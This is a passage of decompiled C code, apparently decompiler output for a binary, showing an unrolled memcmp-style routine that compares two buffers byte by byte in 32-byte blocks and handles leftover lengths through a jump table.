                                                                                                                                      									}
                                                                                                                                      									if(_t1006[0xc] == _t1114[0xc]) {
                                                                                                                                      										_t1136 = 0;
                                                                                                                                      										L49:
                                                                                                                                      										if(_t1136 != 0) {
                                                                                                                                      											goto L98;
                                                                                                                                      										}
                                                                                                                                      										if(_t1006[0x10] == _t1114[0x10]) {
                                                                                                                                      											_t1136 = 0;
                                                                                                                                      											L60:
                                                                                                                                      											if(_t1136 != 0) {
                                                                                                                                      												goto L98;
                                                                                                                                      											}
                                                                                                                                      											if(_t1006[0x14] == _t1114[0x14]) {
                                                                                                                                      												_t1136 = 0;
                                                                                                                                      												L71:
                                                                                                                                      												if(_t1136 != 0) {
                                                                                                                                      													goto L98;
                                                                                                                                      												}
                                                                                                                                      												if(_t1006[0x18] == _t1114[0x18]) {
                                                                                                                                      													_t1136 = 0;
                                                                                                                                      													L82:
                                                                                                                                      													if(_t1136 != 0) {
                                                                                                                                      														goto L98;
                                                                                                                                      													}
                                                                                                                                      													if(_t1006[0x1c] == _t1114[0x1c]) {
                                                                                                                                      														_t1136 = 0;
                                                                                                                                      														L93:
                                                                                                                                      														if(_t1136 != 0) {
                                                                                                                                      															goto L98;
                                                                                                                                      														} else {
                                                                                                                                      															_t1006 =  &(_t1006[_t1134]);
                                                                                                                                      															_t1114 =  &(_t1114[_t1134]);
                                                                                                                                      															_t1135 = _t1135 - _t1134;
                                                                                                                                      															continue;
                                                                                                                                      														}
                                                                                                                                      													}
                                                                                                                                      													_t1149 = (_t1006[0x1c] & 0x000000ff) - (_t1114[0x1c] & 0x000000ff);
                                                                                                                                      													if(_t1149 == 0) {
                                                                                                                                      														L86:
                                                                                                                                      														_t1151 = (_t1006[0x1d] & 0x000000ff) - (_t1114[0x1d] & 0x000000ff);
                                                                                                                                      														if(_t1151 == 0) {
                                                                                                                                      															L88:
                                                                                                                                      															_t1153 = (_t1006[0x1e] & 0x000000ff) - (_t1114[0x1e] & 0x000000ff);
                                                                                                                                      															if(_t1153 == 0) {
                                                                                                                                      																L90:
                                                                                                                                      																_t1136 = (_t1006[0x1f] & 0x000000ff) - (_t1114[0x1f] & 0x000000ff);
                                                                                                                                      																if(_t1136 != 0) {
                                                                                                                                      																	_t207 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      																	_t1136 = (_t1136 > 0) + _t207;
                                                                                                                                      																}
                                                                                                                                      																goto L93;
                                                                                                                                      															}
                                                                                                                                      															_t201 = (0 | _t1153 > 0x00000000) - 1; // -1
                                                                                                                                      															_t1136 = (_t1153 > 0) + _t201;
                                                                                                                                      															if(_t1136 != 0) {
                                                                                                                                      																goto L98;
                                                                                                                                      															}
                                                                                                                                      															goto L90;
                                                                                                                                      														}
                                                                                                                                      														_t195 = (0 | _t1151 > 0x00000000) - 1; // -1
                                                                                                                                      														_t1136 = (_t1151 > 0) + _t195;
                                                                                                                                      														if(_t1136 != 0) {
                                                                                                                                      															goto L98;
                                                                                                                                      														}
                                                                                                                                      														goto L88;
                                                                                                                                      													}
                                                                                                                                      													_t189 = (0 | _t1149 > 0x00000000) - 1; // -1
                                                                                                                                      													_t1136 = (_t1149 > 0) + _t189;
                                                                                                                                      													if(_t1136 != 0) {
                                                                                                                                      														goto L98;
                                                                                                                                      													}
                                                                                                                                      													goto L86;
                                                                                                                                      												}
                                                                                                                                      												_t1156 = (_t1006[0x18] & 0x000000ff) - (_t1114[0x18] & 0x000000ff);
                                                                                                                                      												if(_t1156 == 0) {
                                                                                                                                      													L75:
                                                                                                                                      													_t1158 = (_t1006[0x19] & 0x000000ff) - (_t1114[0x19] & 0x000000ff);
                                                                                                                                      													if(_t1158 == 0) {
                                                                                                                                      														L77:
                                                                                                                                      														_t1160 = (_t1006[0x1a] & 0x000000ff) - (_t1114[0x1a] & 0x000000ff);
                                                                                                                                      														if(_t1160 == 0) {
                                                                                                                                      															L79:
                                                                                                                                      															_t1136 = (_t1006[0x1b] & 0x000000ff) - (_t1114[0x1b] & 0x000000ff);
                                                                                                                                      															if(_t1136 != 0) {
                                                                                                                                      																_t181 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      																_t1136 = (_t1136 > 0) + _t181;
                                                                                                                                      															}
                                                                                                                                      															goto L82;
                                                                                                                                      														}
                                                                                                                                      														_t175 = (0 | _t1160 > 0x00000000) - 1; // -1
                                                                                                                                      														_t1136 = (_t1160 > 0) + _t175;
                                                                                                                                      														if(_t1136 != 0) {
                                                                                                                                      															goto L98;
                                                                                                                                      														}
                                                                                                                                      														goto L79;
                                                                                                                                      													}
                                                                                                                                      													_t169 = (0 | _t1158 > 0x00000000) - 1; // -1
                                                                                                                                      													_t1136 = (_t1158 > 0) + _t169;
                                                                                                                                      													if(_t1136 != 0) {
                                                                                                                                      														goto L98;
                                                                                                                                      													}
                                                                                                                                      													goto L77;
                                                                                                                                      												}
                                                                                                                                      												_t163 = (0 | _t1156 > 0x00000000) - 1; // -1
                                                                                                                                      												_t1136 = (_t1156 > 0) + _t163;
                                                                                                                                      												if(_t1136 != 0) {
                                                                                                                                      													goto L98;
                                                                                                                                      												}
                                                                                                                                      												goto L75;
                                                                                                                                      											}
                                                                                                                                      											_t1163 = (_t1006[0x14] & 0x000000ff) - (_t1114[0x14] & 0x000000ff);
                                                                                                                                      											if(_t1163 == 0) {
                                                                                                                                      												L64:
                                                                                                                                      												_t1165 = (_t1006[0x15] & 0x000000ff) - (_t1114[0x15] & 0x000000ff);
                                                                                                                                      												if(_t1165 == 0) {
                                                                                                                                      													L66:
                                                                                                                                      													_t1167 = (_t1006[0x16] & 0x000000ff) - (_t1114[0x16] & 0x000000ff);
                                                                                                                                      													if(_t1167 == 0) {
                                                                                                                                      														L68:
                                                                                                                                      														_t1136 = (_t1006[0x17] & 0x000000ff) - (_t1114[0x17] & 0x000000ff);
                                                                                                                                      														if(_t1136 != 0) {
                                                                                                                                      															_t155 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      															_t1136 = (_t1136 > 0) + _t155;
                                                                                                                                      														}
                                                                                                                                      														goto L71;
                                                                                                                                      													}
                                                                                                                                      													_t149 = (0 | _t1167 > 0x00000000) - 1; // -1
                                                                                                                                      													_t1136 = (_t1167 > 0) + _t149;
                                                                                                                                      													if(_t1136 != 0) {
                                                                                                                                      														goto L98;
                                                                                                                                      													}
                                                                                                                                      													goto L68;
                                                                                                                                      												}
                                                                                                                                      												_t143 = (0 | _t1165 > 0x00000000) - 1; // -1
                                                                                                                                      												_t1136 = (_t1165 > 0) + _t143;
                                                                                                                                      												if(_t1136 != 0) {
                                                                                                                                      													goto L98;
                                                                                                                                      												}
                                                                                                                                      												goto L66;
                                                                                                                                      											}
                                                                                                                                      											_t137 = (0 | _t1163 > 0x00000000) - 1; // -1
                                                                                                                                      											_t1136 = (_t1163 > 0) + _t137;
                                                                                                                                      											if(_t1136 != 0) {
                                                                                                                                      												goto L98;
                                                                                                                                      											}
                                                                                                                                      											goto L64;
                                                                                                                                      										}
                                                                                                                                      										_t1170 = (_t1006[0x10] & 0x000000ff) - (_t1114[0x10] & 0x000000ff);
                                                                                                                                      										if(_t1170 == 0) {
                                                                                                                                      											L53:
                                                                                                                                      											_t1172 = (_t1006[0x11] & 0x000000ff) - (_t1114[0x11] & 0x000000ff);
                                                                                                                                      											if(_t1172 == 0) {
                                                                                                                                      												L55:
                                                                                                                                      												_t1174 = (_t1006[0x12] & 0x000000ff) - (_t1114[0x12] & 0x000000ff);
                                                                                                                                      												if(_t1174 == 0) {
                                                                                                                                      													L57:
                                                                                                                                      													_t1136 = (_t1006[0x13] & 0x000000ff) - (_t1114[0x13] & 0x000000ff);
                                                                                                                                      													if(_t1136 != 0) {
                                                                                                                                      														_t129 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      														_t1136 = (_t1136 > 0) + _t129;
                                                                                                                                      													}
                                                                                                                                      													goto L60;
                                                                                                                                      												}
                                                                                                                                      												_t123 = (0 | _t1174 > 0x00000000) - 1; // -1
                                                                                                                                      												_t1136 = (_t1174 > 0) + _t123;
                                                                                                                                      												if(_t1136 != 0) {
                                                                                                                                      													goto L98;
                                                                                                                                      												}
                                                                                                                                      												goto L57;
                                                                                                                                      											}
                                                                                                                                      											_t117 = (0 | _t1172 > 0x00000000) - 1; // -1
                                                                                                                                      											_t1136 = (_t1172 > 0) + _t117;
                                                                                                                                      											if(_t1136 != 0) {
                                                                                                                                      												goto L98;
                                                                                                                                      											}
                                                                                                                                      											goto L55;
                                                                                                                                      										}
                                                                                                                                      										_t111 = (0 | _t1170 > 0x00000000) - 1; // -1
                                                                                                                                      										_t1136 = (_t1170 > 0) + _t111;
                                                                                                                                      										if(_t1136 != 0) {
                                                                                                                                      											goto L98;
                                                                                                                                      										}
                                                                                                                                      										goto L53;
                                                                                                                                      									}
                                                                                                                                      									_t1177 = (_t1006[0xc] & 0x000000ff) - (_t1114[0xc] & 0x000000ff);
                                                                                                                                      									if(_t1177 == 0) {
                                                                                                                                      										L42:
                                                                                                                                      										_t1179 = (_t1006[0xd] & 0x000000ff) - (_t1114[0xd] & 0x000000ff);
                                                                                                                                      										if(_t1179 == 0) {
                                                                                                                                      											L44:
                                                                                                                                      											_t1181 = (_t1006[0xe] & 0x000000ff) - (_t1114[0xe] & 0x000000ff);
                                                                                                                                      											if(_t1181 == 0) {
                                                                                                                                      												L46:
                                                                                                                                      												_t1136 = (_t1006[0xf] & 0x000000ff) - (_t1114[0xf] & 0x000000ff);
                                                                                                                                      												if(_t1136 != 0) {
                                                                                                                                      													_t103 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      													_t1136 = (_t1136 > 0) + _t103;
                                                                                                                                      												}
                                                                                                                                      												goto L49;
                                                                                                                                      											}
                                                                                                                                      											_t97 = (0 | _t1181 > 0x00000000) - 1; // -1
                                                                                                                                      											_t1136 = (_t1181 > 0) + _t97;
                                                                                                                                      											if(_t1136 != 0) {
                                                                                                                                      												goto L98;
                                                                                                                                      											}
                                                                                                                                      											goto L46;
                                                                                                                                      										}
                                                                                                                                      										_t91 = (0 | _t1179 > 0x00000000) - 1; // -1
                                                                                                                                      										_t1136 = (_t1179 > 0) + _t91;
                                                                                                                                      										if(_t1136 != 0) {
                                                                                                                                      											goto L98;
                                                                                                                                      										}
                                                                                                                                      										goto L44;
                                                                                                                                      									}
                                                                                                                                      									_t85 = (0 | _t1177 > 0x00000000) - 1; // -1
                                                                                                                                      									_t1136 = (_t1177 > 0) + _t85;
                                                                                                                                      									if(_t1136 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L42;
                                                                                                                                      								}
                                                                                                                                      								_t1184 = (_t1006[8] & 0x000000ff) - (_t1114[8] & 0x000000ff);
                                                                                                                                      								if(_t1184 == 0) {
                                                                                                                                      									L31:
                                                                                                                                      									_t1186 = (_t1006[9] & 0x000000ff) - (_t1114[9] & 0x000000ff);
                                                                                                                                      									if(_t1186 == 0) {
                                                                                                                                      										L33:
                                                                                                                                      										_t1188 = (_t1006[0xa] & 0x000000ff) - (_t1114[0xa] & 0x000000ff);
                                                                                                                                      										if(_t1188 == 0) {
                                                                                                                                      											L35:
                                                                                                                                      											_t1136 = (_t1006[0xb] & 0x000000ff) - (_t1114[0xb] & 0x000000ff);
                                                                                                                                      											if(_t1136 != 0) {
                                                                                                                                      												_t77 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      												_t1136 = (_t1136 > 0) + _t77;
                                                                                                                                      											}
                                                                                                                                      											goto L38;
                                                                                                                                      										}
                                                                                                                                      										_t71 = (0 | _t1188 > 0x00000000) - 1; // -1
                                                                                                                                      										_t1136 = (_t1188 > 0) + _t71;
                                                                                                                                      										if(_t1136 != 0) {
                                                                                                                                      											goto L98;
                                                                                                                                      										}
                                                                                                                                      										goto L35;
                                                                                                                                      									}
                                                                                                                                      									_t65 = (0 | _t1186 > 0x00000000) - 1; // -1
                                                                                                                                      									_t1136 = (_t1186 > 0) + _t65;
                                                                                                                                      									if(_t1136 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L33;
                                                                                                                                      								}
                                                                                                                                      								_t59 = (0 | _t1184 > 0x00000000) - 1; // -1
                                                                                                                                      								_t1136 = (_t1184 > 0) + _t59;
                                                                                                                                      								if(_t1136 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L31;
                                                                                                                                      							}
                                                                                                                                      							_t1191 = (_t1006[4] & 0x000000ff) - (_t1114[4] & 0x000000ff);
                                                                                                                                      							if(_t1191 == 0) {
                                                                                                                                      								L20:
                                                                                                                                      								_t1193 = (_t1006[5] & 0x000000ff) - (_t1114[5] & 0x000000ff);
                                                                                                                                      								if(_t1193 == 0) {
                                                                                                                                      									L22:
                                                                                                                                      									_t1195 = (_t1006[6] & 0x000000ff) - (_t1114[6] & 0x000000ff);
                                                                                                                                      									if(_t1195 == 0) {
                                                                                                                                      										L24:
                                                                                                                                      										_t1136 = (_t1006[7] & 0x000000ff) - (_t1114[7] & 0x000000ff);
                                                                                                                                      										if(_t1136 != 0) {
                                                                                                                                      											_t51 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      											_t1136 = (_t1136 > 0) + _t51;
                                                                                                                                      										}
                                                                                                                                      										goto L27;
                                                                                                                                      									}
                                                                                                                                      									_t45 = (0 | _t1195 > 0x00000000) - 1; // -1
                                                                                                                                      									_t1136 = (_t1195 > 0) + _t45;
                                                                                                                                      									if(_t1136 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L24;
                                                                                                                                      								}
                                                                                                                                      								_t39 = (0 | _t1193 > 0x00000000) - 1; // -1
                                                                                                                                      								_t1136 = (_t1193 > 0) + _t39;
                                                                                                                                      								if(_t1136 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L22;
                                                                                                                                      							}
                                                                                                                                      							_t33 = (0 | _t1191 > 0x00000000) - 1; // -1
                                                                                                                                      							_t1136 = (_t1191 > 0) + _t33;
                                                                                                                                      							if(_t1136 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L20;
                                                                                                                                      						}
                                                                                                                                      						_t1198 = ( *_t1006 & 0x000000ff) - ( *_t1114 & 0x000000ff);
                                                                                                                                      						if(_t1198 == 0) {
                                                                                                                                      							L9:
                                                                                                                                      							_t1200 = (_t1006[1] & 0x000000ff) - (_t1114[1] & 0x000000ff);
                                                                                                                                      							if(_t1200 == 0) {
                                                                                                                                      								L11:
                                                                                                                                      								_t1202 = (_t1006[2] & 0x000000ff) - (_t1114[2] & 0x000000ff);
                                                                                                                                      								if(_t1202 == 0) {
                                                                                                                                      									L13:
                                                                                                                                      									_t1136 = (_t1006[3] & 0x000000ff) - (_t1114[3] & 0x000000ff);
                                                                                                                                      									if(_t1136 != 0) {
                                                                                                                                      										_t25 = (0 | _t1136 > 0x00000000) - 1; // -1
                                                                                                                                      										_t1136 = (_t1136 > 0) + _t25;
                                                                                                                                      									}
                                                                                                                                      									goto L16;
                                                                                                                                      								}
                                                                                                                                      								_t19 = (0 | _t1202 > 0x00000000) - 1; // -1
                                                                                                                                      								_t1136 = (_t1202 > 0) + _t19;
                                                                                                                                      								if(_t1136 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L13;
                                                                                                                                      							}
                                                                                                                                      							_t13 = (0 | _t1200 > 0x00000000) - 1; // -1
                                                                                                                                      							_t1136 = (_t1200 > 0) + _t13;
                                                                                                                                      							if(_t1136 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L11;
                                                                                                                                      						}
                                                                                                                                      						_t7 = (0 | _t1198 > 0x00000000) - 1; // -1
                                                                                                                                      						_t1136 = (_t1198 > 0) + _t7;
                                                                                                                                      						if(_t1136 != 0) {
                                                                                                                                      							goto L98;
                                                                                                                                      						}
                                                                                                                                      						goto L9;
                                                                                                                                      					}
                                                                                                                                      					if(_t1135 > 0x1f) {
                                                                                                                                      						L177:
                                                                                                                                      						_t1007 = 0;
                                                                                                                                      						goto L178;
                                                                                                                                      					}
                                                                                                                                      					switch( *((intOrPtr*)(_t1135 * 4 +  &M0039DD74))) {
                                                                                                                                      						case 0:
                                                                                                                                      							goto L177;
                                                                                                                                      						case 1:
                                                                                                                                      							L256:
                                                                                                                                      							__ecx =  *(__ecx - 1) & 0x000000ff;
                                                                                                                                      							__eax =  *(__eax - 1) & 0x000000ff;
                                                                                                                                      							__eax = __eax - __ecx;
                                                                                                                                      							if(__eax != 0) {
                                                                                                                                      								__ecx = 0;
                                                                                                                                      								_t567 = (0 | __eax > 0x00000000) - 1; // -1
                                                                                                                                      								__eax = (__eax > 0) + _t567;
                                                                                                                                      							}
                                                                                                                                      							goto L178;
                                                                                                                                      						case 2:
                                                                                                                                      							L335:
                                                                                                                                      							if( *(__eax - 2) ==  *(__ecx - 2)) {
                                                                                                                                      								goto L177;
                                                                                                                                      							}
                                                                                                                                      							goto L336;
                                                                                                                                      						case 3:
                                                                                                                                      							L416:
                                                                                                                                      							__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                                      							__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L336:
                                                                                                                                      								__edx =  *(__ecx - 2) & 0x000000ff;
                                                                                                                                      								__esi =  *(__eax - 2) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									goto L256;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                      								if(__edx != 0) {
                                                                                                                                      									L418:
                                                                                                                                      									__eax = __edx;
                                                                                                                                      									goto L178;
                                                                                                                                      								}
                                                                                                                                      								goto L256;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                      							if(__edx == 0) {
                                                                                                                                      								goto L336;
                                                                                                                                      							}
                                                                                                                                      							goto L418;
                                                                                                                                      						case 4:
                                                                                                                                      							L165:
                                                                                                                                      							__edx =  *(__eax - 4);
                                                                                                                                      							if( *(__eax - 4) ==  *(__ecx - 4)) {
                                                                                                                                      								__eax = 0;
                                                                                                                                      								L176:
                                                                                                                                      								if(__eax != 0) {
                                                                                                                                      									goto L178;
                                                                                                                                      								}
                                                                                                                                      								goto L177;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L168:
                                                                                                                                      								__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L170:
                                                                                                                                      									__esi =  *(__eax - 2) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 2) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L173:
                                                                                                                                      										__eax =  *(__eax - 1) & 0x000000ff;
                                                                                                                                      										__eax = __eax - __ecx;
                                                                                                                                      										if(__eax != 0) {
                                                                                                                                      											__ecx = 0;
                                                                                                                                      											_t385 = (0 | __eax > 0x00000000) - 1; // -1
                                                                                                                                      											__eax = (__eax > 0) + _t385;
                                                                                                                                      										}
                                                                                                                                      										goto L176;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                      									if(__edx == 0) {
                                                                                                                                      										goto L173;
                                                                                                                                      									}
                                                                                                                                      									L172:
                                                                                                                                      									__eax = __edx;
                                                                                                                                      									goto L176;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                      								if(__edx != 0) {
                                                                                                                                      									goto L172;
                                                                                                                                      								}
                                                                                                                                      								goto L170;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							__edx = (__esi > 0) + (__esi > 0) - 1;
                                                                                                                                      							if(__edx != 0) {
                                                                                                                                      								goto L172;
                                                                                                                                      							}
                                                                                                                                      							goto L168;
                                                                                                                                      						case 5:
                                                                                                                                      							L245:
                                                                                                                                      							__edx =  *(__eax - 5);
                                                                                                                                      							if( *(__eax - 5) ==  *(__ecx - 5)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L255:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L256;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L248:
                                                                                                                                      								__esi =  *(__eax - 4) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L250:
                                                                                                                                      									__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L252:
                                                                                                                                      										__esi =  *(__eax - 2) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 2) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 2) & 0x000000ff) - ( *(__ecx - 2) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t561 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t561;
                                                                                                                                      										}
                                                                                                                                      										goto L255;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t555 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t555;
                                                                                                                                      									if(__edx + _t555 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L252;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t549 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t549;
                                                                                                                                      								if(__edx + _t549 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L250;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t543 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t543;
                                                                                                                                      							if(__edx + _t543 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L248;
                                                                                                                                      						case 6:
                                                                                                                                      							L324:
                                                                                                                                      							__edx =  *(__eax - 6);
                                                                                                                                      							if( *(__eax - 6) ==  *(__ecx - 6)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L334:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L335;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L327:
                                                                                                                                      								__esi =  *(__eax - 5) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L329:
                                                                                                                                      									__esi =  *(__eax - 4) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L331:
                                                                                                                                      										__esi =  *(__eax - 3) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 3) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 3) & 0x000000ff) - ( *(__ecx - 3) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t743 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t743;
                                                                                                                                      										}
                                                                                                                                      										goto L334;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t737 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t737;
                                                                                                                                      									if(__edx + _t737 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L331;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t731 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t731;
                                                                                                                                      								if(__edx + _t731 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L329;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
                                                                                                                                      							_t725 = __edx - 1; // -1
                                                                                                                                      							__esi = __edx + _t725;
                                                                                                                                      							if(__edx + _t725 != 0) {
                                                                                                                                      								goto L98;
                                                                                                                                      							}
                                                                                                                                      							goto L327;
                                                                                                                                      						case 7:
                                                                                                                                      							L405:
                                                                                                                                      							__edx =  *(__eax - 7);
                                                                                                                                      							if( *(__eax - 7) ==  *(__ecx - 7)) {
                                                                                                                                      								__esi = 0;
                                                                                                                                      								L415:
                                                                                                                                      								if(__esi != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L416;
                                                                                                                                      							}
                                                                                                                                      							__esi = __dl & 0x000000ff;
                                                                                                                                      							__edx =  *(__ecx - 7) & 0x000000ff;
                                                                                                                                      							__esi = (__dl & 0x000000ff) - ( *(__ecx - 7) & 0x000000ff);
                                                                                                                                      							if(__esi == 0) {
                                                                                                                                      								L408:
                                                                                                                                      								__esi =  *(__eax - 6) & 0x000000ff;
                                                                                                                                      								__edx =  *(__ecx - 6) & 0x000000ff;
                                                                                                                                      								__esi = ( *(__eax - 6) & 0x000000ff) - ( *(__ecx - 6) & 0x000000ff);
                                                                                                                                      								if(__esi == 0) {
                                                                                                                                      									L410:
                                                                                                                                      									__esi =  *(__eax - 5) & 0x000000ff;
                                                                                                                                      									__edx =  *(__ecx - 5) & 0x000000ff;
                                                                                                                                      									__esi = ( *(__eax - 5) & 0x000000ff) - ( *(__ecx - 5) & 0x000000ff);
                                                                                                                                      									if(__esi == 0) {
                                                                                                                                      										L412:
                                                                                                                                      										__esi =  *(__eax - 4) & 0x000000ff;
                                                                                                                                      										__edx =  *(__ecx - 4) & 0x000000ff;
                                                                                                                                      										__esi = ( *(__eax - 4) & 0x000000ff) - ( *(__ecx - 4) & 0x000000ff);
                                                                                                                                      										if(__esi != 0) {
                                                                                                                                      											__edx = 0;
                                                                                                                                      											_t928 = (0 | __esi > 0x00000000) - 1; // -1
                                                                                                                                      											__esi = (__esi > 0) + _t928;
                                                                                                                                      										}
                                                                                                                                      										goto L415;
                                                                                                                                      									}
                                                                                                                                      									__edx = 0;
                                                                                                                                      									__edx = 0 | __esi > 0x00000000;
                                                                                                                                      									_t922 = __edx - 1; // -1
                                                                                                                                      									__esi = __edx + _t922;
                                                                                                                                      									if(__edx + _t922 != 0) {
                                                                                                                                      										goto L98;
                                                                                                                                      									}
                                                                                                                                      									goto L412;
                                                                                                                                      								}
                                                                                                                                      								__edx = 0;
                                                                                                                                      								__edx = 0 | __esi > 0x00000000;
                                                                                                                                      								_t916 = __edx - 1; // -1
                                                                                                                                      								__esi = __edx + _t916;
                                                                                                                                      								if(__edx + _t916 != 0) {
                                                                                                                                      									goto L98;
                                                                                                                                      								}
                                                                                                                                      								goto L410;
                                                                                                                                      							}
                                                                                                                                      							__edx = 0;
                                                                                                                                      							__edx = 0 | __esi > 0x00000000;
